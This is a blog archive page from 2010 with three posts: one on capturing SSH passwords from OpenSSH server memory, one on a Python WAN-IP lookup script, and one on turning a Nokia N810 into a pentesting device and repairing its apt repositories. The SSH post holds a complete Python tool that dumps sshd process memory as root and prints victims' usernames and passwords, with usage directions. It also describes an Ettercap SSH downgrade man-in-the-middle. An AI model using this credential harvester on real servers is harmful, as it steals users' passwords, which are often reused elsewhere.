Archive for January 18th, 2010

SSH2, How I love Thee

by on Jan.18, 2010, under Code

A while ago, I read an article regarding SSH2 and an insecurity that it possessed. Being a person who depends on SSH2, I was highly intrigued by this insecurity.

The insecurity involves the handling of credentials in memory when a client is connecting to an OpenSSH server. When the client authenticates with a password, the server has to see that password in clear text in order to verify it: the SSH transport only protects it on the wire, so for the duration of the authentication it sits unencrypted in the sshd process’s memory. So, this attack is merely a local one. For one to worry about this attack, they would have to have their OpenSSH server compromised already (reading another process’s memory requires root), and the attacker would then run the shell script that I wrote. What the attacker gains is not access to the box he already owns, but the user’s password, which is often reused elsewhere.

I’m not taking credit for the discovery of this flaw. I merely wrote a program to automate the capture of the ssh client’s credentials. Once I find the discoverer of the flaw, I will post it. Keep in mind that this program isn’t perfect, but it does work.

Here’s the program in plain text:
http://zitstif.no-ip.org/capturessh2.txt

Here’s the program in a tar file:
http://zitstif.no-ip.org/capturessh2.tar

MD5sum: f9ebfe85ff73641f06625a8c21261d4f

#Tested to work on SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2
#Tested to work on SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1
#Tested to work on OpenSSH 5.2 (protocol 2.0) Fedora 11

If you want to test this on your ssh server, first log into your ssh server and then execute the script with sudo.

Then, posing as the victim yourself, log in to the same ssh server, do your usual business and then log out.

In the attacker’s console, you will see the user name and password that the victim used to authenticate to the ssh server.
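The same technique in Python 3, as an added example: this is not the capturessh2 script from the post (which is not reproduced on this page). It dumps the writable regions of a process through /proc and searches them for the wire layout of a password SSH_MSG_USERAUTH_REQUEST from RFC 4252 section 8, which is what sshd has just decrypted when it checks a password. Whether that buffer is still resident when you dump depends on the OpenSSH build; the sshd PID, the name and password size limits, and the constructed sample dump are assumptions for illustration.

```python
#!/usr/bin/env python3
"""Pull a password out of a process's memory via /proc on Linux (root required).

Added example; not the post's capturessh2 script. It looks for the layout of a
password SSH_MSG_USERAUTH_REQUEST (RFC 4252 section 8) in the dumped memory.
The PID, the size limits and SAMPLE_DUMP are assumptions for illustration.
"""
import re
import struct
import sys

SSH_MSG_USERAUTH_REQUEST = 50
# Fixed tail of a password userauth request, after "string user name":
#   string "ssh-connection"   string "password"   boolean FALSE   string password
MARKER = (struct.pack(">I", 14) + b"ssh-connection"
          + struct.pack(">I", 8) + b"password" + b"\x00")
MAX_NAME = 64        # assumption: longer user names are not looked for
MAX_PASSWORD = 128   # assumption: longer passwords are not looked for


def readable_regions(maps_text):
    """(start, end) of every rw mapping in a /proc/<pid>/maps listing.

    Decrypted packet buffers live in writable memory (heap, stack), so
    read-only code and file mappings are skipped.
    """
    regions = []
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[1].startswith("rw"):
            start, end = (int(x, 16) for x in fields[0].split("-"))
            regions.append((start, end))
    return regions


def dump_process(pid):
    """Concatenate every rw region of `pid` (needs root or ptrace rights on it)."""
    with open(f"/proc/{pid}/maps") as maps:
        regions = readable_regions(maps.read())
    chunks = []
    with open(f"/proc/{pid}/mem", "rb", 0) as mem:
        for start, end in regions:
            try:
                mem.seek(start)
                chunks.append(mem.read(end - start))
            except (OSError, OverflowError):
                continue  # [vvar]/[vsyscall] style regions cannot be read; skip
    return b"".join(chunks)


def find_userauth_requests(blob):
    """Return (user, password) for every password userauth request in `blob`."""
    hits = []
    for m in re.finditer(re.escape(MARKER), blob):
        # Walk back over "string user name" to the message-type byte.
        user = None
        for n in range(1, MAX_NAME + 1):
            lo = m.start() - n - 4          # offset of the uint32 name length
            if lo < 1:
                break
            if (blob[lo:lo + 4] == struct.pack(">I", n)
                    and blob[lo - 1] == SSH_MSG_USERAUTH_REQUEST):
                user = blob[lo + 4:m.start()]
                break
        if user is None:
            continue
        # "string password" follows the marker: uint32 length, then the bytes.
        j = m.end()
        if len(blob) < j + 4:
            continue
        (plen,) = struct.unpack(">I", blob[j:j + 4])
        if not 0 < plen <= MAX_PASSWORD or len(blob) < j + 4 + plen:
            continue
        hits.append((user.decode("utf-8", "replace"),
                     blob[j + 4:j + 4 + plen].decode("utf-8", "replace")))
    return hits


# Constructed dump fragment: junk, then a userauth request for alice/hunter2.
SAMPLE_DUMP = (b"\x00\x00garbage" + bytes([SSH_MSG_USERAUTH_REQUEST])
               + struct.pack(">I", 5) + b"alice" + MARKER
               + struct.pack(">I", 7) + b"hunter2" + b"\x00trailing")


if __name__ == "__main__":
    # usage: sudo ./memauth.py $(pgrep -n sshd)  scans a live process;
    # with no argument it scans the constructed SAMPLE_DUMP instead.
    blob = dump_process(int(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_DUMP
    for user, password in find_userauth_requests(blob):
        print(f"{user}:{password}")
```

Run it without arguments to see it pick alice:hunter2 out of the constructed dump; against a live sshd you would run it as root while the victim is typing the password, since the window in which the decrypted request is resident is short.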

Also, a quick side note: I’m reminded of a pretty nasty attack on ssh clients that can be performed with Ettercap, known as a downgrade attack. A server that still supports both protocol versions announces itself with a banner beginning SSH-1.99-, which tells the client it may use either version. An attacker in the path of the traffic (which Ettercap arranges by ARP poisoning) rewrites that line in transit to a protocol 1 version string such as SSH-1.51-, so a client that is willing to fall back uses protocol 1 instead of protocol 2, and protocol 1 is what Ettercap’s ssh dissector can man-in-the-middle and sniff the password from.

Here’s a link to a tutorial on how to perform this attack:
http://openmaniak.com/ettercap_filter.php

This attack only affects servers that still offer protocol 1 (their banner starts with SSH-1.99 rather than SSH-2.0) and clients willing to fall back to it, ergo it’s not a very high level of threat. A server with Protocol 2 in sshd_config announces SSH-2.0 and the rewrite has nothing to work on, and a client with Protocol 2 in ssh_config refuses a protocol 1 banner outright. You can check what your own server advertises by connecting to port 22 and reading the first line it sends.
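The version exchange above, modelled in Python 3 as an added example (this is not code from the post or from the Ettercap tutorial it links). Both sides are simulated: the identification line sshd sends for a given Protocol setting, the optional on-path rewrite of that line, and the version a client with a given Protocol setting then settles on, following RFC 4253 section 5.1. The rewrite target SSH-1.51 and the software-version suffix are assumptions.

```python
#!/usr/bin/env python3
"""Model the SSH banner downgrade (RFC 4253 section 5.1).

Added example, not from the post or the Ettercap tutorial. The rewrite target
"SSH-1.51" and the software suffix are assumptions.
"""
import socket


def server_banner(protocols, software="OpenSSH_5.1p1"):
    """Identification line sshd sends for sshd_config Protocol = `protocols`.

    '1.99' is the RFC's way of saying "I speak both 1 and 2".
    """
    if 2 in protocols and 1 in protocols:
        return f"SSH-1.99-{software}\r\n"
    if 2 in protocols:
        return f"SSH-2.0-{software}\r\n"
    return f"SSH-1.5-{software}\r\n"


def parse_banner(line):
    """'SSH-1.99-OpenSSH_5.1p1' -> ('1.99', 'OpenSSH_5.1p1'); None if malformed."""
    parts = line.rstrip("\r\n").split("-", 2)
    if len(parts) != 3 or parts[0] != "SSH":
        return None
    return parts[1], parts[2]


def downgrade_filter(banner):
    """The on-path rewrite: make the server look like it only speaks protocol 1."""
    return banner.replace("SSH-1.99-", "SSH-1.51-")


def client_choice(banner, protocols):
    """Version a client with ssh_config Protocol = `protocols` ends up using,
    or None if it disconnects."""
    parsed = parse_banner(banner)
    if parsed is None:
        return None
    version = parsed[0]
    if version == "1.99":                # server offers both; client prefers 2
        return 2 if 2 in protocols else (1 if 1 in protocols else None)
    major = version.split(".", 1)[0]
    if major == "2":
        return 2 if 2 in protocols else None
    if major == "1":
        return 1 if 1 in protocols else None
    return None


def exchange(server_protocols, client_protocols, mitm=False):
    """Run one version exchange and return the version the client settles on."""
    banner = server_banner(server_protocols)
    if mitm:
        banner = downgrade_filter(banner)
    return client_choice(banner, client_protocols)


def live_banner(host, port=22, timeout=5):
    """First line a real sshd sends; 'SSH-1.99-' means protocol 1 is still on."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return sock.recv(255).decode("ascii", "replace").rstrip("\r\n")


if __name__ == "__main__":
    for server, client, mitm in [((2, 1), (2, 1), False), ((2, 1), (2, 1), True),
                                 ((2, 1), (2,), True), ((2,), (2, 1), True)]:
        print(f"server Protocol {server}, client Protocol {client}, mitm={mitm}: "
              f"client uses {exchange(server, client, mitm)}")
```

The four cases printed by the demo are the whole story: the downgrade only succeeds when the server advertises 1.99 and the client is allowed to fall back; either side set to Protocol 2 alone defeats it. live_banner() is the check against your own server.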


ipchicken.py

by on Jan.18, 2010, under Code, Posts

If you are one of the very, very few who remember a shell script that I wrote a while back that lets you know your WAN IP address from the command line (ipchicken), I wrote a replacement for it in Python. I hope this is useful to you:

ipchicken.py

#!/usr/bin/env python
#ipchicken.py - print your WAN IP address (Python 2)#
import re
import urllib
import socket
import sys

#Test that ipchicken.com is up#
var = socket.socket()
var.settimeout(10)
try:
        var.connect(('www.ipchicken.com', 80))
except socket.error:
        var.close()
        print "www.ipchicken.com seems to be down.."
        sys.exit(1)
var.close()

#Fetch the page as one string#
var = urllib.urlopen('http://www.ipchicken.com')
var = var.read()

#Dotted quad; \b stops it matching inside longer numbers#
reg = r"\b[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\b"

found = re.findall(reg, var)
if not found:
        print "Couldn't find an IP address on the page.."
        sys.exit(1)
for ip in found:
        print """Your WAN IP address is: %s \nBrought to you by www.ipchicken.com""" % ip
sys.exit(0)

Also, the beauty of this is that all you need is Python, so it should work on any operating system that supports Python.

Of course, if you have dog for Linux, then you can get the same effect with just a quick one-liner:

dog http://www.ipchicken.com | egrep -wo "[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}"

http://www.google.com/search?hl=en&source=hp&q=dog+is+better+than+cat+linux&aq=f&oq=&aqi=
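Both the script and the one-liner trust any dotted quad they find. As an added example in Python 3 (not the post’s ipchicken.py or the dog one-liner), here is the extraction done with validation: octets are range-checked, private and loopback addresses that a page may also contain are dropped, and the regex is anchored on word boundaries. The HTML sample is constructed, since the real page’s markup is not shown here.

```python
#!/usr/bin/env python3
"""Pick a public IPv4 address out of a page like ipchicken.com's.

Added example (Python 3); not the post's ipchicken.py. SAMPLE_HTML is a
constructed page fragment.
"""
import ipaddress
import re
import urllib.request

# Same shape as the post's regex, but anchored on word boundaries so that
# "v2.1.0.1000" cannot yield "2.1.0.100".
DOTTED_QUAD = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def is_public(ip):
    """True for an address that could plausibly be a WAN address."""
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def extract_public_ips(html):
    """Distinct public IPv4 addresses in `html`, in order of first appearance.

    A bare dotted-quad regex also accepts "999.1.1.1" and RFC 1918 or loopback
    addresses that a page may happen to contain; both are filtered here.
    """
    found = []
    for cand in DOTTED_QUAD.findall(html):
        try:
            ip = ipaddress.IPv4Address(cand)
        except ValueError:
            continue                      # an octet above 255
        if is_public(ip) and ip not in found:
            found.append(ip)
    return [str(ip) for ip in found]


def wan_ip(url="http://www.ipchicken.com", timeout=10):
    """Fetch `url` and return the first public address on it, or None.

    Over plain HTTP anyone on the path can rewrite the answer, so treat it as
    informational rather than feeding it straight into a firewall rule.
    """
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        html = resp.read().decode("utf-8", "replace")
    ips = extract_public_ips(html)
    return ips[0] if ips else None


# Constructed page fragment with the usual false positives mixed in.
SAMPLE_HTML = ("<p>client v2.1.0.1000 from 10.0.0.7 via 127.0.0.1</p>"
               "<p>999.1.1.1 is not an address; you are 8.8.8.8 (8.8.8.8)</p>")

if __name__ == "__main__":
    print(extract_public_ips(SAMPLE_HTML))     # offline demo on the sample
```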


In the land of Nokia N810

by on Jan.18, 2010, under Posts

Last December I acquired a Nokia N810 internet tablet. For those of you who aren’t familiar with this device, the Nokia N810 is an internet tablet that you can use for web browsing, listening to music, reading e-books, VoIP calls or what have you. In the end it’s basically a pocket-sized computer.

For more detailed information please view: http://en.wikipedia.org/wiki/Nokia_N810

The main reason why I had interest in this device, was due to a certain time when I was browsing the web, and I stumbled upon this Irongeek page.

I thought to myself, “Well how cool is that? This is essentially a poor man’s iPhone that has a keyboard and is Linux based. Also, getting one used on eBay would cost < 200 dollars.”

After making the final decision and purchasing one for a mere $176, I quickly turned it into a portable pentesting machine!

To gain root is trivial, just install this:

http://maemo.org/downloads/product/OS2008/rootsh/

Here’s a list of some of the applications that I’ve put on my Nokia N810:

aircrack-ng
btaudit
btscanner
ettercap
hcitool
kismet
l2ping
minicom
ncat
ncftp
ndiff
netcat
nikto (downloaded from cirt.net)
nmap
python
rdesktop
rfcomm
roxterm
ruby
sdptool
socat
ssh (client)
sshfs
tcpdump
telnet
traceroute
vncviewer
wget

This device, though, hasn’t been without its headaches. I remember reading a warning on a website about installing duplicate repositories on OS2008 (Diablo). Here’s a link to a huge list of repositories that have these oh-so-useful tools (the page also carries the warning):

http://www.gronmayer.com/it/

By mistake, at a later time, I eventually did install a duplicate repository. After doing so, I wasn’t able to install anything, and performing an ‘apt-get update’ would yield errors that pointed towards duplicate repositories being installed. Along with that, the application manager and apt were incredibly slow, to the point where I lost patience. It was time to take a peek at the sources.list and do some Googling.

Firstly, if you’re used to Debian-based Linux distributions, you can find the sources.list file in /etc/apt/sources.list, but for Maemo the path to the sources.list file is: /etc/apt/sources.list.d/hildon-application-manager.list

I also noticed that repository.maemo.org was not responding at all whatsoever. Even now, you can’t resolve the host name. After some searching I found:

http://talk.maemo.org/showthread.php?t=13721

It seems silly, but to get repository.maemo.org to respond you have to do the following as root on your Nokia N810:

echo "62.61.85.32 repository.maemo.org" >> /etc/hosts

I also noticed that a bunch of repositories were timing out when I would run ‘apt-get update’. So, to do a quick test on the repository list, I wrote a very small one-liner to ping each repository.

for i in $(cat /etc/apt/sources.list.d/hildon-application-manager.list | awk '{print $2}' | cut -d'/' -f3); do ping -c1 $i 2>&1; done  >> repfix.log

I then used ‘grep’ to look through ‘repfix.log’ for ‘bad’, which revealed the host names that responded with ‘ping: bad address’. This gave me a list of repositories that were no longer up.

I used vi as root to remove the repositories that were no longer up in /etc/apt/sources.list.d/hildon-application-manager.list.

Lastly, I ran ‘apt-get update’ as root and I no longer had any issues. Along with that, I could install applications again!
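The same clean-up done in one pass, as an added example in Python 3 (not from the post): it removes the duplicate entries that break apt on Maemo and comments out, rather than deletes, the repositories whose host no longer resolves, so the edit is reversible. The file path is the one given above; the resolver is injectable so the constructed sample list runs without network, and dead.example is an assumed dead host.

```python
#!/usr/bin/env python3
"""Tidy a Maemo/apt sources list: drop duplicate entries and comment out
repositories whose host no longer resolves.

Added example, not from the post. Intended for
/etc/apt/sources.list.d/hildon-application-manager.list (back it up first);
SAMPLE_LIST and the host dead.example are constructed.
"""
import socket
import sys
from urllib.parse import urlsplit


def parse_entry(raw):
    """('deb', url, suite, [components]) for a deb/deb-src line, else None."""
    fields = raw.split()
    if len(fields) < 3 or fields[0] not in ("deb", "deb-src"):
        return None                      # comments, blank lines, anything else
    return fields[0], fields[1], fields[2], fields[3:]


def resolves(host):
    """DNS check; the post's one-liner used ping for the same purpose."""
    try:
        socket.gethostbyname(host)
        return True
    except socket.gaierror:
        return False


def clean_sources(text, resolver=resolves):
    """Return (cleaned_text, report).

    apt complains when the same (url, suite, component) appears twice, so the
    dedupe is per component: a line with nothing new is dropped and a partly
    redundant one is trimmed. Entries whose host does not resolve are kept but
    commented out, so the change is easy to reverse.
    """
    out, seen, report, cache = [], set(), [], {}
    for raw in text.splitlines():
        entry = parse_entry(raw)
        if entry is None:
            out.append(raw)
            continue
        kind, url, suite, comps = entry
        base = (kind, url.rstrip("/"), suite)   # "extras" and "extras/" are one repo
        new = [c for c in (comps or [""]) if base + (c,) not in seen]
        seen.update(base + (c,) for c in new)
        if not new:
            report.append(("duplicate", raw.strip()))
            continue
        line = " ".join([kind, url, suite] + [c for c in new if c])
        if len(new) < len(comps):
            report.append(("trimmed", line))
        host = urlsplit(url).hostname
        if host not in cache:
            cache[host] = resolver(host)
        if cache[host]:
            out.append(line)
        else:
            report.append(("unresolvable", line))
            out.append("# " + line + "   # host does not resolve")
    return "\n".join(out) + "\n", report


# Constructed list: a redundant entry, a dead host, and a './' style entry.
SAMPLE_LIST = """\
deb http://repository.maemo.org/extras/ diablo free non-free
deb http://repository.maemo.org/extras/ diablo free
deb http://dead.example/repo chinook free
deb http://catalogue.tableteer.nokia.com/updates/diablo-2/ ./
"""


if __name__ == "__main__":
    if len(sys.argv) > 1:                # real file, real DNS
        with open(sys.argv[1]) as f:
            cleaned, report = clean_sources(f.read())
    else:                                # offline demo; dead.example is the dead host
        cleaned, report = clean_sources(SAMPLE_LIST,
                                        resolver=lambda h: h != "dead.example")
    sys.stdout.write(cleaned)
    for what, line in report:
        print(f"{what}: {line}", file=sys.stderr)
```

The cleaned list goes to stdout and the report to stderr, so `python3 cleanlist.py hildon-application-manager.list > new.list` lets you inspect the result before copying it over the original as root and running ‘apt-get update’.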

Here’s a list of the repositories that are working for me; hopefully this might save you a headache or two if you’re a tweaker of the Nokia N810:

deb http://catalogue.tableteer.nokia.com/certified/ diablo user
deb http://catalogue.tableteer.nokia.com/non-certified/ diablo user
deb http://catalogue.tableteer.nokia.com/updates/diablo-2/ ./
deb http://repository.maemo.org/extras/ diablo free non-free
deb http://repository.maemo.org/extras chinook free non-free
deb http://www.fbreader.org/maemo diablo user
deb http://p.quinput.eu/debfarm chinook user
deb http://qole.org/repository maemo main
deb http://www.mulliner.org/nokia770/repository/ chinook free
deb http://browser-extras.garage.maemo.org/browser-extras/ chinook browser-extras
deb http://sanker.info/mend0za/maemo/tkabber bora tkabber
deb http://maemo.shmuma.ru/repo/ chinook free
deb http://repository.maemo.org/ chinook free non-free
deb http://packages.gizmoproject.com/chinook chinook user
deb http://reg.fring.com/repository/ chinook release
deb http://repository.maemo.org/extras/ diablo free
deb http://stage.maemo.org/extras/ chinook free non-free
deb http://stage.maemo.org/ chinook free non-free

Also, here’s a copy of my /etc/hosts file:

127.0.0.1 Nokia-N810-43-7 localhost
62.61.85.32 repository.maemo.org

Feb 13, 2010: UPDATE!:

Now it is unnecessary to edit your hosts file to mend the repository.maemo.org resolution issue.

host repository.maemo.org
repository.maemo.org is an alias for repository.maemo.org.edgesuite.net.
repository.maemo.org.edgesuite.net is an alias for a515.g.akamai.net.
a515.g.akamai.net has address 198.63.194.139
a515.g.akamai.net has address 198.63.194.161
